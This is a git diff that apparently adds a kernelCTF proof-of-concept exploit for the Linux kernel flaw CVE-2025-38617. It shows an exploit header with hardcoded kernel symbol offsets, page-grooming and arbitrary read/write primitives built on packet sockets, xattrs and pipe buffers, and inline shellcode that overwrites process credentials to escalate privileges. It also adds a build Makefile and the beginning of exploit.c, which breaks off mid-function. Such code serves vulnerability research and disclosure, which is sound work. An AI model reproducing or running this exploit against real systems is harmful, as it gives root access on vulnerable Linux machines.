anon_pipe_buf_ops_offset_from_kernel_base = 0x1c22580; +u64 struct_task_struct_member_cred_offset = 0x7d8; +u64 struct_task_struct_member_real_cred_offset = 0x7d0; +u64 struct_task_struct_member_fs_offset = 0x828; +u64 init_cred = 0x2a75f00; +u64 init_fs = 0x2bb4860; +u64 __x86_return_thunk = 0x16054b0; +u64 __do_sys_kcmp = 0x23c850; + +static inline void update_kernel_address(u64 kernel_base) +{ + init_cred += kernel_base; + init_fs += kernel_base; + __x86_return_thunk += kernel_base; + __do_sys_kcmp += kernel_base; +} + +static inline bool is_data_look_like_simple_xattr(void *data, size_t value_size) +{ + struct simple_xattr *simple_xattr = data; + struct list_head *list = &simple_xattr->list; + + if ( + (((u64)(list->next) >> 48) == 0xFFFF) && + (((u64)(list->prev) >> 48) == 0xFFFF) && + (((u64)(simple_xattr->name) >> 48) == 0xFFFF) && + (simple_xattr->size == value_size) + ) + return true; + + return false; +} + +static inline void simple_xattr_dump(struct simple_xattr *simple_xattr) +{ + struct list_head *list = &(simple_xattr->list); + printf("====== simple_xattr_dump ======\n"); + printf("list->next: 0x%016lx\n", (u64)(list->next)); + printf("list->prev: 0x%016lx\n", (u64)(list->prev)); + printf("name: 0x%016lx\n", (u64)(simple_xattr->name)); + printf("value_size: 0x%016lx\n", (u64)(simple_xattr->size)); + printf("value: %s\n", (char *)(simple_xattr->value)); +} + +struct pipe_buffer { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; + unsigned long private; +}; + +static_assert(sizeof(struct pipe_buffer) == 40, "sizeof(struct pipe_buffer) not match with kernel"); + +static inline bool is_data_look_like_pipe_buffer(struct pipe_buffer *pipe_buffer) +{ + if ( + (((u64)(pipe_buffer->page) >> 48) == 0xFFFF) && + (((u64)(pipe_buffer->ops) & 0xFFFFFF) == anon_pipe_buf_ops_last_24_bits) + ) + return true; + + return false; +} + +static inline void pipe_buffer_dump(struct pipe_buffer *pipe_buffer) +{ + printf("====== pipe_buffer_dump 
======\n"); + printf("page: 0x%016lx\n", (u64)(pipe_buffer->page)); + printf("offset: %u, len: %u\n", pipe_buffer->offset, pipe_buffer->len); + printf("ops: 0x%016lx\n", (u64)(pipe_buffer->ops)); + printf("flags: %u\n", pipe_buffer->flags); + printf("private: 0x%016lx\n", pipe_buffer->private); +} + +/* Error handling */ +void unix_error(const char *msg); +void Mnl_socket_error(const char *msg); +void Pthread_error(const char *msg, int error_code); +/* Error handling */ + +/* libc wrapper */ + +void Unshare(int flags); +int Socket(int domain, int type, int protocol); +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen); +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen); +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen); +void Ioctl(int fd, unsigned long request, unsigned long arg); +void Close(int fd); +int Dup(int fd); +void Pipe2(int pipefd[2], int flags); +int Fcntl(int fd, int op, unsigned long arg); +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset); +void Munmap(void *addr, size_t len); +FILE *Fopen(const char *filename, const char *modes); +void Fclose(FILE *stream); +void *Calloc(size_t nmemb, size_t size); +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags); +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg); +void Pthread_join(pthread_t thread, void **retval); +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset); +void Getrlimit(int resource, struct rlimit *rlim); +void Setrlimit(int resource, const struct rlimit *rlim); +void Setpriority(int which, id_t who, int value); +int Timerfd_create(int clockid, int flags); +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value); +int Epoll_create1(int flags); +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event); 
+unsigned int If_nametoindex(const char *ifname); +void Mkdir(const char *pathname, mode_t mode); +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data); +int Open(const char *pathname, int flags, mode_t mode); +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags); +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size); +void Removexattr(const char *path, const char *name); +char *Strdup(const char *s); +ssize_t Read(int fd, void *buf, size_t count); +ssize_t Write(int fd, const void *buf, size_t count); +/* libc wrapper */ + +/* libmnl wrapper */ +struct mnl_socket *Mnl_socket_open(int bus); +void Mnl_socket_close(struct mnl_socket *nl); +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int groups, pid_t pid); +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size); +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size); +/* libmnl wrapper */ + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq); +void dummy_network_interface_create(const char *ifname, u32 mtu); +void network_interface_up(int configure_socket_fd, const char *ifname); +void network_interface_down(int configure_socket_fd, const char *ifname); +void pin_thread_on_cpu(int cpu); +void setup_namespace(void); +void setup_tmpfs(void); +void setup_nofile_rlimit(void); +void create_file(const char *path); +bool thread_in_sleep_state(int tid); +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size); +void free_pages(int packet_socket); + +struct victim_packet_socket_config { + struct __kernel_sock_timeval sndtimeo; + struct sockaddr_ll addr; + struct tpacket_req3 tx_ring; + struct tpacket_req3 rx_ring; + int packet_loss; + int packet_version; + unsigned packet_reserve; + struct sock_filter filter[MAX_FILTER_LEN]; +}; + +struct victim_packet_socket_config 
*victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +); + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config); + +struct victim_packet_socket { + struct victim_packet_socket_config *config; + int fd; +}; + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config); +void victim_packet_socket_destroy(struct victim_packet_socket *v); +void victim_packet_socket_configure(struct victim_packet_socket *v); + +struct simple_xattr_request { + char filepath[PATH_MAX]; + char name[XATTR_NAME_MAX + 1]; + char *value; + size_t value_size; + bool allocated; +}; + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +); + +void simple_xattr_request_destroy(struct simple_xattr_request *request); + +struct timerfd_waitlist_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + int timerfd; + int *timerfds; + int total_timerfd; + struct epoll_event *epoll_events; +}; + +void *timerfd_waitlist_thread_fn(void *arg); +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t); +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd); +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t); + +struct 
pg_vec_lock_thread_work { + struct victim_packet_socket *victim_packet_socket; + int ifindex; +}; + +struct pg_vec_lock_thread_work *pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex); +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w); + +struct pg_vec_lock_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + atomic_int tid; + int packet_socket; + int ifindex; + struct pg_vec_lock_thread_work *work; +}; + +void *pg_vec_lock_thread_fn(void *arg); +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w); +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t); +void pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t); +void pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t); +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void); +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t); + +struct pg_vec_buffer_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + struct pg_vec_buffer_thread_work *work; +}; + +struct pg_vec_buffer_thread_work { + struct victim_packet_socket *victim_packet_socket; + bool exploit; + bool cleanup; +}; + +struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +); +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w); + +void *pg_vec_buffer_thread_fn(void *arg); +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w); +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t); +struct 
pg_vec_buffer_thread *pg_vec_buffer_thread_create(void); +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t); + +struct tpacket_rcv_thread_work { + struct timespec pg_vec_lock_release_time; + struct timespec decrease_tpacket_rcv_thread_sleep_time; + struct msghdr *msg; +}; + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +); + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w); + +struct tpacket_rcv_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + struct tpacket_rcv_thread_work *work; +}; + +void *tpacket_rcv_thread_fn(void *arg); +void tpacket_rcv_thread_send_work(struct tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w); +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t); +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t); +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void); +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t); + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +); + +void msghdr_destroy(struct msghdr *msghdr); + +static inline struct timespec timespec_sub(struct timespec t1, struct timespec t2) +{ + struct timespec diff = {}; + diff.tv_nsec = t1.tv_nsec - t2.tv_nsec; + diff.tv_sec = t1.tv_sec - t2.tv_sec; + + if (diff.tv_sec > 0 && diff.tv_nsec < 0) { + diff.tv_nsec += NSEC_PER_SEC; + diff.tv_sec--; + } else if (diff.tv_sec < 0 && diff.tv_nsec > 0) { + diff.tv_nsec -= NSEC_PER_SEC; + diff.tv_sec++; + } + + return diff; +} + +static inline struct timespec timespec_add(struct timespec t1, struct timespec t2) +{ + struct timespec sum = {}; + sum.tv_nsec = t1.tv_nsec + t2.tv_nsec; + sum.tv_sec = t1.tv_sec + t2.tv_sec; + + if (sum.tv_nsec >= NSEC_PER_SEC) { + sum.tv_sec++; + sum.tv_nsec -= 
NSEC_PER_SEC; + } + + return sum; +} + +static inline u64 timespec_div(struct timespec t1, struct timespec t2) +{ + u64 ns1 = t1.tv_sec * NSEC_PER_SEC + t1.tv_nsec; + u64 ns2 = t2.tv_sec * NSEC_PER_SEC + t2.tv_nsec; + return ns1 / ns2; +} + +static inline int timespec_cmp(struct timespec t1, struct timespec t2) +{ + if (t1.tv_sec < t2.tv_sec) + return -1; + + if (t1.tv_sec > t2.tv_sec) + return 1; + + if (t1.tv_nsec < t2.tv_nsec) + return -1; + + if (t1.tv_nsec > t2.tv_nsec) + return 1; + + return 0; +} + +static struct timespec null_timespec = { .tv_sec = 0, .tv_nsec = 0 }; + +struct necessary_threads { + struct timerfd_waitlist_thread **timerfd_waitlist_threads; + struct pg_vec_lock_thread *pg_vec_lock_thread; + struct pg_vec_buffer_thread *pg_vec_buffer_thread; + struct tpacket_rcv_thread *tpacket_rcv_thread; +}; + +struct necessary_threads *necessary_threads_create(int timerfd); +void necessary_threads_destroy(struct necessary_threads *nt); + +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH "/tmp/tmpfs/pages_order2_groom" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT "security.pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT "pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN "pages_order2_groom_" +#define TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY 2048 + +struct pages_order2_read_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + struct simple_xattr_request *simple_xattr_requests[TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY]; + struct simple_xattr_request *overflowed_simple_xattr_request; + struct simple_xattr_request *leaked_content_simple_xattr_request; + u64 overflowed_simple_xattr_kernel_address; + u64 leaked_content_simple_xattr_kernel_address; +}; + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive); +void 
pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +); + +bool pages_order2_read_primitive_build_primitive( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +); + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive); +bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive); + +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_NAME_FMT "security.leaked_pages_order3_addr_%d" +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_VALUE_FMT "leaked_pages_order3_addr_%d" + +#define TOTAL_PAGES_ORDER2_PG_VEC_SPRAY 256 + +struct simple_xattr_read_write_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + int spray_pg_vec_packet_sockets[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int 
spray_pg_vec_packet_sockets_state[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int overflowed_pg_vec_packet_socket; + struct simple_xattr_request *manipulated_simple_xattr_request; + void *mmap_address; +}; + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_main_work( + struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +); + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +); + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive); +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive 
*simple_xattr_read_write_primitive); + +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr_name" +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr" + +#define FAKE_SIMPLE_XATTR_NAME "security.fake_simple_xattr_name" +#define DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION "security.detect_fake_simple_xattr_reclaimation" + +struct abr_page_read_write_primitive { + int packet_socket_with_overwritten_pg_vec; + int packet_socket_to_overwrite_pg_vec; + u64 overwrite_pg_vec_mmap_size; + u64 overwritten_pg_vec_mmap_size; + u64 original_buffer_page_addr; +}; + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_write_primitive +); + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +); + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +); + +#define LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME "security.leaked_pages_order2_addr_for_pipe_buffer" + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +); + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive); + +extern void privilege_escalation_shellcode_begin(void); +extern void privilege_escalation_shellcode_end(void); + +__asm__( + ".intel_syntax noprefix;" + ".global privilege_escalation_shellcode_begin;" + ".global privilege_escalation_shellcode_end;" + + "privilege_escalation_shellcode_begin:\n" + + "mov rax,QWORD PTR gs:0x20c80;" + "shl rdi, 32;" 
+ "shl rsi, 32;" + "shr rsi, 32;" + "or rdi, rsi;" + "mov QWORD PTR [rax + 0x7d0], rdi;" + "mov QWORD PTR [rax + 0x7d8], rdi;" + "mov QWORD PTR [rax + 0x828], rcx;" + "jmp r8;" + + "privilege_escalation_shellcode_end:\n" + ".att_syntax;" +); + +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 000000000..e9e975869 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,32 @@ +# taken from: https://github.com/google/security-research/blob/1bb2f8c8d95a34cafe7861bc890cfba5d85ec141/pocs/linux/kernelctf/CVE-2024-0193_lts/exploit/lts-6.1.67/Makefile + +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build + +LIBS = -L$(LIBMNL_DIR)/install/lib -lmnl +INCLUDES = -I$(LIBMNL_DIR)/libmnl-1.0.5/include +CFLAGS = -static -Ofast + +exploit: exploit.c + gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS) + + +prerequisites: libmnl-build + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install + + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + +run: + ./exploit + +clean: + rm -f exploit + rm -rf $(LIBMNL_DIR) diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit new file mode 100644 index 000000000..c243400ba Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit differ diff --git 
a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 000000000..a1b5a8589 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,2158 @@ +#include "exploit.h" + +void unix_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Mnl_socket_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Pthread_error(const char *msg, int error_code) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(error_code)); + exit(EXIT_FAILURE); +} + +void Unshare(int flags) +{ + if (unshare(flags) < 0) + unix_error("unshare"); +} + +int Socket(int domain, int type, int protocol) +{ + int fd = socket(domain, type, protocol); + if (fd < 0) + unix_error("socket"); + return fd; +} + +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen) +{ + if (setsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("setsockopt"); +} + +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen) +{ + if (getsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("getsockopt"); +} + +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen) +{ + if (bind(fd, addr, addrlen) < 0) + unix_error("bind"); +} + +void Ioctl(int fd, unsigned long request, unsigned long arg) +{ + if (ioctl(fd, request, arg) < 0) + unix_error("ioctl"); +} + +void Close(int fd) +{ + if (close(fd) < 0) + unix_error("close"); +} + +int Dup(int fd) +{ + int newfd = dup(fd); + if (newfd < 0) + unix_error("dup"); + return newfd; +} + +void Pipe2(int pipefd[2], int flags) +{ + if (pipe2(pipefd, flags) < 0) + unix_error("pipe2"); +} + +int Fcntl(int fd, int op, unsigned long arg) +{ + int ret = fcntl(fd, op, arg); + if (ret < 0) + 
unix_error("fcntl"); + return ret; +} + +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset) +{ + void *m = mmap(addr, len, prot, flags, fd, offset); + if (m == MAP_FAILED) + unix_error("mmap"); + return m; +} + +void Munmap(void *addr, size_t len) +{ + if (munmap(addr, len) < 0) + unix_error("munmap"); +} + +FILE *Fopen(const char *filename, const char *modes) +{ + FILE *f = fopen(filename, modes); + if (f == NULL) + unix_error("fopen"); + return f; +} + +void Fclose(FILE *stream) +{ + if (fclose(stream) != 0) + unix_error("fclose"); +} + +void *Calloc(size_t nmemb, size_t size) +{ + void *p = calloc(nmemb, size); + if (p == NULL) + unix_error("calloc"); + return p; +} + +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags) +{ + ssize_t ret = sendmsg(socket, message, flags); + if (ret < 0) + unix_error("sendmsg"); + return ret; +} + +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg) +{ + int ret = pthread_create(newthread, attr, start_routine, arg); + if (ret != 0) + Pthread_error("pthread_create", ret); +} + +void Pthread_join(pthread_t thread, void **retval) +{ + int ret = pthread_join(thread, retval); + if (ret != 0) + Pthread_error("pthread_join", ret); +} + +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset) +{ + int ret = pthread_setaffinity_np(thread, cpusetsize, cpuset); + if (ret != 0) + Pthread_error("pthread_setaffinity_np", ret); +} + +void Getrlimit(int resource, struct rlimit *rlim) +{ + if (getrlimit(resource, rlim) < 0) + unix_error("getrlimit"); +} + +void Setrlimit(int resource, const struct rlimit *rlim) +{ + if (setrlimit(resource, rlim) < 0) + unix_error("setrlimit"); +} + +void Setpriority(int which, id_t who, int value) +{ + if (setpriority(which, who, value) < 0) + unix_error("setpriority"); +} + +int Timerfd_create(int clockid, int flags) +{ + int timerfd = timerfd_create(clockid, flags); + if 
(timerfd < 0) + unix_error("timerfd_create"); + return timerfd; +} + +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value) +{ + if (timerfd_settime(fd, flags, new_value, old_value) < 0) + unix_error("timerfd_settime"); +} + +int Epoll_create1(int flags) +{ + int epfd = epoll_create1(flags); + if (epfd < 0) + unix_error("epoll_create1"); + return epfd; +} + +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event) +{ + if (epoll_ctl(epfd, op, fd, event) < 0) + unix_error("epoll_ctl"); +} + +unsigned int If_nametoindex(const char *ifname) +{ + unsigned int ifindex = if_nametoindex(ifname); + if (ifindex == 0) + unix_error("if_nametoindex"); + return ifindex; +} + +void Mkdir(const char *pathname, mode_t mode) +{ + if (mkdir(pathname, mode) < 0) + unix_error("mkdir"); +} + +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data) +{ + if (mount(source, target, filesystemtype, mountflags, data) < 0) + unix_error("mount"); +} + +int Open(const char *pathname, int flags, mode_t mode) +{ + int fd = open(pathname, flags, mode); + if (fd < 0) + unix_error("open"); + return fd; +} + +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags) +{ + if (setxattr(path, name, value, size, flags) < 0) + unix_error("setxattr"); +} + +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size) +{ + ssize_t ret = getxattr(path, name, value, size); + if (ret < 0) + unix_error("getxattr"); + return ret; +} + +void Removexattr(const char *path, const char *name) +{ + if (removexattr(path, name) < 0) + unix_error("removexattr"); +} + +char *Strdup(const char *s) +{ + char *s1 = strdup(s); + if (s1 == NULL) + unix_error("strdup"); + return s1; +} + +ssize_t Read(int fd, void *buf, size_t count) +{ + ssize_t ret = read(fd, buf, count); + if (ret < 0) + unix_error("read"); + return ret; +} + +ssize_t Write(int 
fd, const void *buf, size_t count) +{ + ssize_t ret = write(fd, buf, count); + if (ret < 0) + unix_error("write"); + return ret; +} + +struct mnl_socket *Mnl_socket_open(int bus) +{ + struct mnl_socket *nl = mnl_socket_open(bus); + if (nl == NULL) + Mnl_socket_error("mnl_socket_open"); + return nl; +} + +void Mnl_socket_close(struct mnl_socket *nl) +{ + if (mnl_socket_close(nl) < 0) + Mnl_socket_error("mnl_socket_close"); +} + +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int groups, pid_t pid) +{ + if (mnl_socket_bind(nl, groups, pid) < 0) + Mnl_socket_error("mnl_socket_bind"); +} + +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size) +{ + ssize_t rc = mnl_socket_sendto(nl, req, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_sendto"); + return rc; +} + +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size) +{ + ssize_t rc = mnl_socket_recvfrom(nl, buf, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_recvfrom"); + return rc; +} + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq) +{ + u8 buf[8192] = {}; + u32 portid = mnl_socket_get_portid(nl); + ssize_t ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + + while (ret > 0) { + ret = mnl_cb_run(buf, ret, seq, portid, NULL, NULL); + if (ret <= 0) + break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + + if (ret < 0) + exit(EXIT_FAILURE); +} + +void dummy_network_interface_create(const char *ifname, u32 mtu) +{ + struct mnl_socket *nl = Mnl_socket_open(NETLINK_ROUTE); + Mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID); + u32 seq = time(NULL); + u8 buf[8192] = {}; + + struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf); + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_seq = seq; + nlh->nlmsg_flags = NLM_F_ACK | NLM_F_REQUEST | NLM_F_CREATE; + + struct ifinfomsg *ifm = mnl_nlmsg_put_extra_header(nlh, sizeof(*ifm)); + mnl_attr_put_strz(nlh, IFLA_IFNAME, ifname); + mnl_attr_put_u32(nlh, IFLA_MTU, mtu); + + struct nlattr 
